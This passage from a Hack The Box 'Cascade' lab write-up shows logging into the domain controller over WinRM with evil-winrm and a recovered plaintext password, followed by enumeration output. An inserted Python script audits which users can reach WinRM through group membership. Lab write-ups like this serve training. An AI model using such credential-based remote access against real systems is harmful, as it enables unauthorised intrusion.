WinRM
I initially discovered a WinRM service running on the target system on port 5985.
There was nothing to be done at that point, as I did not have any valid domain credentials with such privileges.
I was able to decrypt and recover the encrypted VNC password, which turned out to belong to the s.smith user.
The s.smith user is part of the Remote Management Users group, as enumerated from both ldapdomaindump and BloodHound.
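The condition that makes this foothold possible is a non-administrative account holding effective membership in Remote Management Users. The following is an added example (not part of the original writeup, and not ldapdomaindump's own code) that audits that condition over a constructed group export shaped like ldapdomaindump's domain_groups.json; the record layout, the member DNs and the s.smith/helpdesk.user entries are assumptions made for the example.

```python
import json

# Constructed sample shaped like ldapdomaindump's domain_groups.json export
# (a list of {"dn": ..., "attributes": {...}} records). The layout and every
# member DN below are assumptions for this example, not data from the page.
SAMPLE_GROUPS = json.dumps([
    {"dn": "CN=Remote Management Users,CN=Builtin,DC=cascade,DC=local",
     "attributes": {"cn": ["Remote Management Users"],
                    "member": ["CN=s.smith,OU=Users,DC=cascade,DC=local",
                               "CN=IT,OU=Groups,DC=cascade,DC=local"]}},
    {"dn": "CN=IT,OU=Groups,DC=cascade,DC=local",
     "attributes": {"cn": ["IT"],
                    "member": ["CN=helpdesk.user,OU=Users,DC=cascade,DC=local"]}},
    {"dn": "CN=Domain Admins,CN=Users,DC=cascade,DC=local",
     "attributes": {"cn": ["Domain Admins"],
                    "member": ["CN=Administrator,CN=Users,DC=cascade,DC=local"]}},
])

ADMIN_GROUPS = {"Domain Admins", "Administrators", "Enterprise Admins"}

def load_groups(text):
    """Map group name -> list of direct member DNs."""
    groups = {}
    for rec in json.loads(text):
        attrs = rec["attributes"]
        groups[attrs["cn"][0]] = list(attrs.get("member", []))
    return groups

def rdn(dn):
    """First RDN value, e.g. 'CN=IT,OU=Groups,...' -> 'IT'."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def expand(groups, name, seen=None):
    """Resolve nested groups to the set of user DNs with effective membership."""
    seen = set() if seen is None else seen
    seen.add(name)                      # guard against group cycles
    users = set()
    for dn in groups.get(name, []):
        member = rdn(dn)
        if member in groups:            # nested group: recurse into it
            if member not in seen:
                users |= expand(groups, member, seen)
        else:
            users.add(dn)
    return users

def winrm_review(groups):
    """Return {user DN: is_admin} for everyone who can reach WinRM through
    Remote Management Users; entries marked False deserve a second look."""
    admins = set()
    for g in ADMIN_GROUPS:
        admins |= expand(groups, g)
    return {u: u in admins for u in sorted(expand(groups, "Remote Management Users"))}

if __name__ == "__main__":
    for user, is_admin in winrm_review(load_groups(SAMPLE_GROUPS)).items():
        print(("admin   " if is_admin else "REVIEW  ") + user)
```

Nested membership is expanded, so a user who reaches the group only via a child group (helpdesk.user through IT here) is reported as well.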
Here, I will attempt to gain an initial foothold on the DC host via WinRM.
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ evil-winrm -i casc-dc1.cascade.local -u s.smith -p 'sT333ve2'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> whoami
cascade\s.smith
*Evil-WinRM* PS C:\Users\s.smith\Documents> hostname
CASC-DC1
*Evil-WinRM* PS C:\Users\s.smith\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 4:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::e8dc:7157:1983:a2bd
   Link-local IPv6 Address . . . . . : fe80::e8dc:7157:1983:a2bd%15
   IPv4 Address. . . . . . . . . . . : 10.10.10.182
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%15
                                       10.10.10.2
Tunnel adapter isatap.{603b363a-a965-4463-a4d0-a8850f844e1e}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
Initial foothold established on the target system as the s.smith user via WinRM.